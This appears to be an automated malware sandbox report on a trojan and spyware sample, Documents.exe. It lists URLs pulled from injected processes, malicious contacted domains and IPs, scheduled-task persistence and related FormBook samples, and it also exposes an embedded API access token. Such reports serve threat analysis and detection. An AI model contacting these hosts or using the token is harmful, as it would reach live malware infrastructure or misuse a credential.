                                                            http://www.6822662.xyz/baishimolinair/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/yasendi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/468c40599126.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDocuments.exe, 00000000.00000002.2154688065.0000000003376000.00000004.00000800.00020000.00000000.sdmp, uFEeKIucsX.exe, 0000000A.00000002.2277213173.00000000028E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.6822662.xyz/jiuzhonghuannai/2/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.6822662.xyz/jiuzhonghuannai/7/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referrasystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.101domain.com/resource_center.htmsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.6822662.xyz/gongdilan/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cs.deviceatlas-cdn.com/smartclicksystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.6822662.xyz/lingcunaili/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.6822662.xyz/xidaoailiw/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.6822662.xyz/ruocainaiyang/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://park.101datacenter.net/css/fonts/LatoRegular.woff2systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.6822662.xyz/Dating/129d40599465.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cs.deviceatlas-cdn.comsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.6822662.xyz/youtianzhenxi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.ecosia.org/newtab/systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.6822662.xyz/jiuzhonghuannai/10/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.netvWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.net/css/vendor-1.css?20240925050808systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.net/css/fonts/LatoRegular.woff)systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/zuozuomumingxi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/Dating/449a40599145.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/template/news/news10/css/layout.csssystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.net/js/modernizr-webp.js?20240925050808systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/jiuzhonghuannai/8/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.net/css/fonts/LatoRegular.woff2)systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZMsystray.exe, 00000011.00000002.4500910385.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.000000000352A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.net/images/vendor-1/park-back.webpvWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://park.101datacenter.net/js/pricing.js?20240925050808systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/Dating/776b40598818.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourcesystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/sitemap.xmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/jiuzhonghuannai/5/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPYsystray.exe, 00000011.00000002.4500910385.0000000005248000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003398000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/Dating/047a40599547.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.6822662.xyz/Dating/87c40599507.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cacDocuments.exe, uFEeKIucsX.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=carpentry.club&utm_systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.6822662.xyz/jiuzhonghuannai/6/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refersystray.exe, 00000011.00000002.4500910385.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.6822662.xyz/guchuanyizhi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsystray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://zrinorem-srumimit.sbs/vWFGbvOdxI.exe, 00000012.00000002.4500346640.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.6822662.xyz/Dating/912f40598682.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_ssystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://park.101datacenter.net/images/vendor-1/com.pngsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.101domain.com/gmail_email_aliases.htmsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.6822662.xyz/Dating/068e399928.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_ssystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.6822662.xyz/Dating/289d399707.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        162.0.215.33
                                                                        		nieuws-july202488.sbsCanada
                                                                        		35893ACPCAtrue
                                                                        13.248.169.48
                                                                        		www.hasan.cloudUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        199.192.23.123
                                                                        		www.learnnow.infoUnited States
                                                                        		22612NAMECHEAP-NETUStrue
                                                                        104.18.73.116
                                                                        		www.losmason.shopUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        121.43.155.35
                                                                        		www.lingdianyun29.xyzChina
                                                                        		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                        75.2.103.23
                                                                        		www.innovationpulse.techUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        161.97.142.144
                                                                        		www.030002449.xyzUnited States
                                                                        		51167CONTABODEtrue
                                                                        192.185.147.100
                                                                        		hayaniya.orgUnited States
                                                                        		26337OIS1UStrue
                                                                        52.60.87.163
                                                                        		www.carpentry.clubUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        185.106.208.3
                                                                        		holytur.netTurkey
                                                                        		42846GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTRfalse
                                                                        103.249.106.91
                                                                        		www.6822662.xyzChina
                                                                        		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                                                        3.33.130.190
                                                                        		duskgazes.workUnited States
                                                                        		8987AMAZONEXPANSIONGBtrue
                                                                        172.67.222.69
                                                                        		www.zrinorem-srumimit.sbsUnited States
                                                                        		13335CLOUDFLARENETUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1564384
                                                                        Start date and time:2024-11-28 09:12:15 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 59s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:19
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Documents.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@23/16@14/13
                                                                        EGA Information:
                                                                        • Successful, ratio: 80%
                                                                        HCA Information:
                                                                        • Successful, ratio: 96%
                                                                        • Number of executed functions: 94
                                                                        • Number of non-executed functions: 307
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target vWFGbvOdxI.exe, PID 1788 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Documents.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        03:13:06API Interceptor2x Sleep call for process: Documents.exe modified
                                                                        03:13:14API Interceptor43x Sleep call for process: powershell.exe modified
                                                                        03:13:18API Interceptor2x Sleep call for process: uFEeKIucsX.exe modified
                                                                        03:14:12API Interceptor9968994x Sleep call for process: systray.exe modified
                                                                        09:13:14Task SchedulerRun new task: uFEeKIucsX path: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        162.0.215.33dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202541.sbs/0bvv/
                                                                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/4bpc/
                                                                        r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/rq5n/
                                                                        rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/rq5n/
                                                                        z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/rq5n/
                                                                        13.248.169.48CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                        • www.egyshare.xyz/lp5b/
                                                                        attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.aktmarket.xyz/wb7v/
                                                                        file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.gupiao.bet/t3a1/
                                                                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.krshop.shop/grhe/
                                                                        Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                        • www.a1shop.shop/5cnx/
                                                                        ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.tals.xyz/tj5o/
                                                                        santi.exeGet hashmaliciousFormBookBrowse
                                                                        • www.lirio.shop/qp0h/
                                                                        PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                        • www.optimismbank.xyz/98j3/
                                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tals.xyz/cpgr/
                                                                        VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                        • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.losmason.shopsanti.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.18.73.116
                                                                        www.hasan.cloudfile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 13.248.169.48
                                                                        www.learnnow.infofile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 199.192.23.123

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        NAMECHEAP-NETUSPayment_Slip.pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        Banorte_Aviso_de_Pago_pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        Payment_Slip.pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        Banorte_Aviso_de_Pago_pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 162.0.234.192
                                                                        FATURA.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.238.246
                                                                        file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 199.192.23.123
                                                                        https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=trueGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                        • 162.0.231.89
                                                                        https://kkinternational.co.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 185.61.154.40
                                                                        FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.229.222
                                                                        ACPCAoS6KsQIqJxe038Y.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                        • 162.55.60.2
                                                                        pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                        • 162.65.144.8
                                                                        https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                                        • 162.55.246.61
                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 162.52.56.205
                                                                        nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 162.48.203.221
                                                                        FATURA.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.209.213
                                                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                        • 162.10.7.182
                                                                        Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                        • 162.55.60.2
                                                                        MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 162.55.60.2
                                                                        wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 162.55.60.2
                                                                        AMAZON-02USnabmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.168.247.140
                                                                        nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 44.226.239.16
                                                                        nabarm.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.126.138.72
                                                                        nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 44.233.171.208
                                                                        nabx86.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.171.230.55
                                                                        invoice-1664809283.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                        • 185.166.143.50
                                                                        invoice-1664809283.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                        • 185.166.143.49
                                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                        • 18.135.214.149
                                                                        botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                                        • 54.232.32.230
                                                                        botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                        • 18.197.218.104

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Documents.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
